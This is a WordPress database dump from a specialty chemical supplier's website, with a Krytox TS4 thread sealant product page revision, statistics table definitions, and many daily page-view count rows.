INSERT INTO `wp_posts` VALUES (4872, 2, '2017-08-21 18:05:07', '2017-08-21 18:05:07', '', 'Krytox FPG 182', '', 'inherit', 'closed', 'closed', '', 'shutterstock_425883247', '', '', '2017-08-21 18:05:22', '2017-08-21 18:05:22', '', 973, 'https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_425883247.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4873, 0, '2017-08-21 18:27:18', '2017-08-21 18:27:18', '', '', '', 'publish', 'closed', 'closed', '', '4873', '', '', '2017-08-21 18:27:18', '2017-08-21 18:27:18', '', 0, 'https://www.miller-stephenson.com/nf_sub/4873/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4874, 0, '2017-08-21 19:49:04', '2017-08-21 19:49:04', '', '', '', 'publish', 'closed', 'closed', '', '4874', '', '', '2017-08-21 19:49:04', '2017-08-21 19:49:04', '', 0, 'https://www.miller-stephenson.com/nf_sub/4874/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4875, 3, '2017-08-22 14:03:33', '2017-08-22 14:03:33', '<h2>Krytox TS4 Thread Sealant</h2>\n<h3>Superior Performance, Unmatched Chemical and Corrosion Resistance, Direct replacement for Teflon™ Tape</h3>\nKrytox TS4 Thread Sealant (TS4) is unlike PTFE tape, which should be removed before re-application. Krytox TS4 Thread Sealant can be re-applied over existing Krytox thread sealant. Clings to threads and will not shred or tear on assembly/disassembly.Cannot plug or restrict critical piping, valves, or instruments like tape solids. Krytox™ TS4 is non-reactive, non-toxic, nonflammable, non-corrosive and compatible with most seal, O-ring, and valve polymers. No VOC content or hydrocarbon in the product; safe for oxygen use with no auto-ignition temperatures. Tested leak free under helium at 400 psi for 7 days.* Safe for use: The Chlorine Institute (Pamphlet 164) rates Krytox lubricants a “1”. Lubricates threads, preventing costly thread damage from galling and seizing during assembly. Allows low breakaway torque for easy-to-break connections.\n<h3>Krytox TS4 Thread Sealant - Provides Superior Sealing for all Threaded Pipes</h3>\nKrytox TS4 was designed from its inception to have higher performance and be safer and easier to use than standard Teflon Tape. Utilizing over 60 years of thread sealant experience, our new TS4 was developed to perform where other sealants fail.  Higher pressure, corrosive environments are the ideal application of our TS4 sealant. Traditionally, PTFE (Teflon™) tape is used to seal valves, actuators, pipe fittings and fasteners.  Krytox™ TS4 PFPE sealant provides the highest securing performance for water, air, steam, natural gas, reactive gases and liquids without the drawbacks of tapes. PTFE tapes can result in costly thread damage during assembly due to galling and seizure.  Krytox™ TS4 provides for low breakaway torque for easy-to-break connections.  Additionally, TS4 is a cost effective solution when compared to like chemistries and products, such as Halocarbon Grease, Fluorolube Grease, Lox-8 Paste or PTFE tape as only a minor amount is needed per application.\n<h4>Want to test this product? Click here for a free sample</h4>\nAs seen in the video below Krytox TS4 performs in the most extreme environments and offers superior performance.\n\nhttps://www.youtube.com/watch?v=XxJbQOWtIG0', 'Krytox TS4 Thread Sealant', 'Traditionally, PTFE (Teflon™) tape is used to seal valves, actuators, pipe fittings and fasteners.  Krytox™ TS4 PFPE sealant provides the highest securing performance for water, air, steam, natural gas, reactive gases and liquids without the drawbacks of tapes. Thread sealant (TS4) is unlike PTFE tape, which should be removed before re-application. Krytox TS4 can be re-applied over existing Krytox thread sealant. Clings to threads and will not shred or tear on assembly/disassembly. Benefit include:\n<ul>\n 	<li>Superior to Teflon™ Tape</li>\n 	<li>Cannot plug or restrict critical piping, valves, or instruments</li>\n 	<li>Non-Reactive, non-toxic, nonflammabe, oxygen safe</li>\n 	<li>Chemical and corrosion resistance</li>\n</ul>\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'inherit', 'closed', 'closed', '', '989-autosave-v1', '', '', '2017-08-22 14:03:33', '2017-08-22 14:03:33', '', 989, 'https://www.miller-stephenson.com/989-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4876, 3, '2017-08-22 14:04:10', '0000-00-00 00:00:00', '', 'Auto Draft', '', 'auto-draft', 'closed', 'closed', '', '', '', '', '2017-08-22 14:04:10', '0000-00-00 00:00:00', '', 0, 'https://www.miller-stephenson.com/?p=4876', 0, 'post', '', 0);
#
# End of data contents of table `wp_posts`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_social_users`


#
# Delete any existing table `wp_social_users`
#

DROP TABLE IF EXISTS `wp_social_users`;


#
# Table structure of table `wp_social_users`
#

CREATE TABLE `wp_social_users` (
  `ID` int(11) NOT NULL,
  `type` varchar(20) NOT NULL,
  `identifier` varchar(100) NOT NULL,
  KEY `ID` (`ID`,`type`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 ;

#
# Data contents of table `wp_social_users`
#

#
# End of data contents of table `wp_social_users`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_statistics_exclusions`


#
# Delete any existing table `wp_statistics_exclusions`
#

DROP TABLE IF EXISTS `wp_statistics_exclusions`;


#
# Table structure of table `wp_statistics_exclusions`
#

CREATE TABLE `wp_statistics_exclusions` (
  `ID` int(11) NOT NULL AUTO_INCREMENT,
  `date` date NOT NULL,
  `reason` varchar(255) DEFAULT NULL,
  `count` bigint(20) NOT NULL,
  PRIMARY KEY (`ID`),
  KEY `date` (`date`),
  KEY `reason` (`reason`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 ;

#
# Data contents of table `wp_statistics_exclusions`
#

#
# End of data contents of table `wp_statistics_exclusions`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_statistics_historical`


#
# Delete any existing table `wp_statistics_historical`
#

DROP TABLE IF EXISTS `wp_statistics_historical`;


#
# Table structure of table `wp_statistics_historical`
#

CREATE TABLE `wp_statistics_historical` (
  `ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `category` varchar(25) NOT NULL,
  `page_id` bigint(20) NOT NULL,
  `uri` varchar(255) NOT NULL,
  `value` bigint(20) NOT NULL,
  PRIMARY KEY (`ID`),
  UNIQUE KEY `page_id` (`page_id`),
  UNIQUE KEY `uri` (`uri`),
  KEY `category` (`category`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 ;

#
# Data contents of table `wp_statistics_historical`
#

#
# End of data contents of table `wp_statistics_historical`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_statistics_pages`


#
# Delete any existing table `wp_statistics_pages`
#

DROP TABLE IF EXISTS `wp_statistics_pages`;


#
# Table structure of table `wp_statistics_pages`
#

CREATE TABLE `wp_statistics_pages` (
  `uri` varchar(255) NOT NULL,
  `date` date NOT NULL,
  `count` int(11) NOT NULL,
  `id` int(11) NOT NULL,
  UNIQUE KEY `date_2` (`date`,`uri`),
  KEY `url` (`uri`),
  KEY `date` (`date`),
  KEY `id` (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 ;

#
# Data contents of table `wp_statistics_pages`
#
 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240az/', '2016-10-04', 1, 638); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-for-injection-molding/', '2016-10-04', 3, 1115); 
INSERT INTO `wp_statistics_pages` VALUES ('/', '2016-10-04', 118, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xht-bdx/', '2016-10-04', 3, 697); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ac/', '2016-10-04', 3, 644); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ac/?wc-ajax=get_refreshed_fragments', '2016-10-04', 3, 644); 
INSERT INTO `wp_statistics_pages` VALUES ('/?wc-ajax=get_refreshed_fragments', '2016-10-04', 36, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/about/', '2016-10-04', 6, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/quik-freeze-antistatic/', '2016-10-04', 1, 1726); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/quik-freeze-ms-242n/', '2016-10-04', 1, 1719); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/', '2016-10-04', 8, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/', '2016-10-04', 7, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form', '2016-10-04', 1, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form/', '2016-10-04', 2, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/', '2016-10-04', 17, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122ad/', '2016-10-04', 3, 1677); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/?wc-ajax=get_refreshed_fragments', '2016-10-04', 1, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xht-bdx/?wc-ajax=get_refreshed_fragments', '2016-10-04', 2, 697); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/', '2016-10-04', 6, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/', '2016-10-04', 2, 1149); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/?wc-ajax=get_refreshed_fragments', '2016-10-04', 1, 1149); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/', '2016-10-04', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles/', '2016-10-04', 5, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/news/', '2016-10-04', 3, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/terms-conditions/', '2016-10-04', 3, 2150); 
INSERT INTO `wp_statistics_pages` VALUES ('/npb-and-hcfc-225-replacements/', '2016-10-04', 2, 1124); 
INSERT INTO `wp_statistics_pages` VALUES ('/dental-handpiece-lubricant/', '2016-10-04', 3, 1128); 
INSERT INTO `wp_statistics_pages` VALUES ('/opteon-sion-for-vapor-degreasing/', '2016-10-04', 3, 1135); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents-which-is-right-for-you/', '2016-10-04', 4, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/vazo-free-radical-initiator/', '2016-10-04', 3, 1601); 
INSERT INTO `wp_statistics_pages` VALUES ('/vertrel-fluids/', '2016-10-04', 2, 1121); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-lube-for-life/', '2016-10-04', 2, 1117); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-tm7-for-tire-mold-industry/', '2016-10-04', 3, 1113); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/', '2016-10-04', 3, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-ts4-thread-sealant/', '2016-10-04', 2, 2056); 
INSERT INTO `wp_statistics_pages` VALUES ('/wishlist/view/', '2016-10-04', 2, 5); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fluoropolymer-coatings/', '2016-10-04', 2, 469); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/millube-perfluorinated-synthetic-lubricants/', '2016-10-04', 2, 468); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/milglide-compounding-additives/', '2016-10-04', 2, 467); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/milsolv-medical-solvents/', '2016-10-04', 2, 473); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fluoroextreme-dental-lubricants/', '2016-10-04', 2, 474); 
INSERT INTO `wp_statistics_pages` VALUES ('/specialty-products-solvents/', '2016-10-04', 3, 1871); 
INSERT INTO `wp_statistics_pages` VALUES ('/epoxy-and-coatings/', '2016-10-04', 2, 1295); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240aa/', '2016-10-04', 1, 642); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122xd/', '2016-10-04', 1, 1681); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/spray-trigger/', '2016-10-04', 1, 1852); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/contact-re-nu/', '2016-10-04', 1, 1292); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-aut-2045/', '2016-10-04', 1, 713); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-460h/', '2016-10-04', 1, 620); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-460h/?wc-ajax=get_refreshed_fragments', '2016-10-04', 1, 620); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-143ax/', '2016-10-04', 1, 305); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-58005/', '2016-10-04', 1, 977); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-58005/?wc-ajax=get_refreshed_fragments', '2016-10-04', 1, 977); 
INSERT INTO `wp_statistics_pages` VALUES ('/cart/', '2016-10-04', 3, 20); 
INSERT INTO `wp_statistics_pages` VALUES ('/releasys-release-agent/', '2016-10-04', 1, 455); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/shieldsys-rfi-nickel-conductive-coating/', '2016-10-04', 2, 1722); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/shieldsys-rfi-nickel-conductive-coating/?wc-ajax=get_refreshed_fragments', '2016-10-04', 1, 1722); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-64/', '2016-10-04', 1, 427); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-67/', '2016-10-04', 1, 575); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-475c/', '2016-10-04', 2, 621); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-475c/?wc-ajax=get_refreshed_fragments', '2016-10-04', 1, 621); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/', '2016-10-04', 1, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/', '2016-10-05', 559, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-xf/', '2016-10-05', 3, 1278); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-xf/?wc-ajax=get_refreshed_fragments', '2016-10-05', 2, 1278); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1001-x-75/', '2016-10-05', 1, 918); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1001-x-75/?wc-ajax=get_refreshed_fragments', '2016-10-05', 1, 918); 
INSERT INTO `wp_statistics_pages` VALUES ('/?wc-ajax=get_refreshed_fragments', '2016-10-05', 196, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/', '2016-10-05', 90, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/', '2016-10-05', 5, 1149); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/?wc-ajax=get_refreshed_fragments', '2016-10-05', 4, 1149); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122ad/', '2016-10-05', 17, 1677); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122ad/?wc-ajax=get_refreshed_fragments', '2016-10-05', 8, 1677); 
INSERT INTO `wp_statistics_pages` VALUES ('/the-chemours-company-selects-wilmington-delaware-for-its-global-headquarters/', '2016-10-05', 3, 662); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-for-injection-molding/', '2016-10-05', 2, 1115); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-tm7-for-tire-mold-industry/', '2016-10-05', 2, 1113); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1163/', '2016-10-05', 1, 1019); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1163/?wc-ajax=get_refreshed_fragments', '2016-10-05', 1, 1019); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/', '2016-10-05', 45, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/news/', '2016-10-05', 12, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles/', '2016-10-05', 8, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/about/', '2016-10-05', 12, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/', '2016-10-05', 30, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/terms-conditions/', '2016-10-05', 1, 2150); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-143te/', '2016-10-05', 4, 303); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-143te/?wc-ajax=get_refreshed_fragments', '2016-10-05', 2, 303); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-143ax/', '2016-10-05', 1, 305); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-w/', '2016-10-05', 3, 1059); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-w/?wc-ajax=get_refreshed_fragments', '2016-10-05', 1, 1059); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/', '2016-10-05', 12, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/', '2016-10-05', 9, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/?wc-ajax=get_refreshed_fragments', '2016-10-05', 7, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/the-chemours-company-selects-wilmington-delaware-for-its-global-headquarters/?wc-ajax=get_refreshed_fragments', '2016-10-05', 1, 662); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-505/', '2016-10-05', 1, 1270); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-111-epoxy-stripping-agent/', '2016-10-05', 2, 1152); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-111-epoxy-stripping-agent/?wc-ajax=get_refreshed_fragments', '2016-10-05', 1, 1152); 
INSERT INTO `wp_statistics_pages` VALUES ('/specialty-products-solvents/', '2016-10-05', 3, 1871); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-101/', '2016-10-05', 1, 436); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-107/', '2016-10-05', 4, 442); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1514/', '2016-10-05', 4, 944); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products', '2016-10-05', 4, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1514/?wc-ajax=get_refreshed_fragments', '2016-10-05', 2, 944); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-lube-for-life/', '2016-10-05', 3, 1117); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fluoroguard-sg/', '2016-10-05', 1, 1431); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fluoroguard-pro/', '2016-10-05', 1, 1435); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/milglide-compounding-additives/', '2016-10-05', 1, 467); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/milglide-compounding-additives/?wc-ajax=get_refreshed_fragments', '2016-10-05', 1, 467); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/?wc-ajax=get_refreshed_fragments', '2016-10-05', 3, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122av/', '2016-10-05', 9, 182); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/teflon-silicone-lubricant/', '2016-10-05', 2, 1819); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/teflon-multi-use/', '2016-10-05', 1, 1801); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/teflon-white-lithium-grease/', '2016-10-05', 1, 1106); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsl/?wc-ajax=get_refreshed_fragments', '2016-10-05', 1, 960); 
INSERT INTO `wp_statistics_pages` VALUES ('/epoxy-and-coatings/', '2016-10-05', 9, 1295); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/', '2016-10-05', 41, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form', '2016-10-05', 12, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form/', '2016-10-05', 14, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-52/', '2016-10-05', 2, 568); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-52/?wc-ajax=get_refreshed_fragments', '2016-10-05', 1, 568); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-aut-2a45/', '2016-10-05', 1, 715); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-aut-2a45/?wc-ajax=get_refreshed_fragments', '2016-10-05', 1, 715); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/?wc-ajax=get_refreshed_fragments', '2016-10-05', 1, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-830/', '2016-10-05', 1, 882); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1002f/', '2016-10-05', 1, 937); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fluoropolymer-coatings/', '2016-10-05', 1, 469); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fluoropolymer-coatings/?wc-ajax=get_refreshed_fragments', '2016-10-05', 1, 469); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-8280/', '2016-10-05', 2, 891); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-202/', '2016-10-05', 3, 783); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fluoroguard-pca/', '2016-10-05', 1, 1428); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-472s/', '2016-10-05', 1, 738); 
INSERT INTO `wp_statistics_pages` VALUES ('/news/?wc-ajax=get_refreshed_fragments', '2016-10-05', 2, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/releasys-release-agent/', '2016-10-05', 3, 455); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-2a1/?wc-ajax=get_refreshed_fragments', '2016-10-05', 1, 1009); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-200/', '2016-10-05', 2, 347); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-200/?wc-ajax=get_refreshed_fragments', '2016-10-05', 1, 347); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-201/', '2016-10-05', 1, 769); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-201/?wc-ajax=get_refreshed_fragments', '2016-10-05', 1, 769); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-202/?wc-ajax=get_refreshed_fragments', '2016-10-05', 1, 783); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-203/', '2016-10-05', 1, 784); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-203/?wc-ajax=get_refreshed_fragments', '2016-10-05', 1, 784); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-107/?wc-ajax=get_refreshed_fragments', '2016-10-05', 2, 442); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-106/', '2016-10-05', 1, 441); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-106/?wc-ajax=get_refreshed_fragments', '2016-10-05', 1, 441); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ab/', '2016-10-05', 1, 643); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-407/', '2016-10-05', 3, 1111); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-407/?wc-ajax=get_refreshed_fragments', '2016-10-05', 3, 1111); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-nrt-8908/', '2016-10-05', 2, 881); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-nrt-8908/?wc-ajax=get_refreshed_fragments', '2016-10-05', 1, 881); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-460h/', '2016-10-05', 3, 620); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-nrt-8906/', '2016-10-05', 1, 880); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-nrt-8906/?wc-ajax=get_refreshed_fragments', '2016-10-05', 1, 880); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-246/', '2016-10-05', 1, 1088); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-246/?wc-ajax=get_refreshed_fragments', '2016-10-05', 1, 1088); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240aa/', '2016-10-05', 1, 642); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240az/', '2016-10-05', 1, 638); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122se/', '2016-10-05', 5, 302); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122se/?wc-ajax=get_refreshed_fragments', '2016-10-05', 1, 302); 
INSERT INTO `wp_statistics_pages` VALUES ('/dental-handpiece-lubricant/', '2016-10-05', 2, 1128); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-475c/', '2016-10-05', 1, 621); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xht-bdz/', '2016-10-05', 2, 696); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-226/', '2016-10-05', 2, 850); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/?wc-ajax=get_refreshed_fragments', '2016-10-05', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/releasys-82-semi-permanent-release-agents/', '2016-10-05', 3, 400); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-116/', '2016-10-05', 1, 1212); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-116/?wc-ajax=get_refreshed_fragments', '2016-10-05', 1, 1212); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-61/', '2016-10-05', 1, 1069); 
INSERT INTO `wp_statistics_pages` VALUES ('/npb-and-hcfc-225-replacements/', '2016-10-05', 2, 1124); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-67/', '2016-10-05', 1, 575); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-67/?wc-ajax=get_refreshed_fragments', '2016-10-05', 1, 575); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-815c/', '2016-10-05', 3, 910); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-815c/?wc-ajax=get_refreshed_fragments', '2016-10-05', 3, 910); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-71/', '2016-10-05', 1, 1230); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-205/', '2016-10-05', 2, 789); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-88/', '2016-10-05', 1, 577); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-88/?wc-ajax=get_refreshed_fragments', '2016-10-05', 1, 577); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-472c/', '2016-10-05', 1, 736); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-472c/?wc-ajax=get_refreshed_fragments', '2016-10-05', 1, 736); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/', '2016-10-05', 10, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-account/%20', '2016-10-05', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-account/', '2016-10-05', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/customer-logout/%20', '2016-10-05', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/customer-logout/', '2016-10-05', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/teflon-silicone-lubricant/?wc-ajax=get_refreshed_fragments', '2016-10-05', 1, 1819); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsh/', '2016-10-05', 1, 956); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-143xd/', '2016-10-05', 1, 306); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-280282/', '2016-10-05', 1, 1713); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122av/?wc-ajax=get_refreshed_fragments', '2016-10-05', 2, 182); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/releasys-89-semi-permanent-release-agents/', '2016-10-05', 2, 425); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-1a3/', '2016-10-05', 1, 996); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/', '2016-10-05', 4, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-ts4-thread-sealant/', '2016-10-05', 1, 989); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-ts4-thread-sealant/?wc-ajax=get_refreshed_fragments', '2016-10-05', 1, 989); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-eg-2000/', '2016-10-05', 1, 967); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/?wc-ajax=get_refreshed_fragments', '2016-10-05', 3, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/vazo-free-radical-initiator/', '2016-10-05', 2, 1601); 
INSERT INTO `wp_statistics_pages` VALUES ('/vazo-free-radical-initiator/?wc-ajax=get_refreshed_fragments', '2016-10-05', 1, 1601); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/?wc-ajax=get_refreshed_fragments', '2016-10-05', 2, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xht-s/', '2016-10-05', 1, 659); 
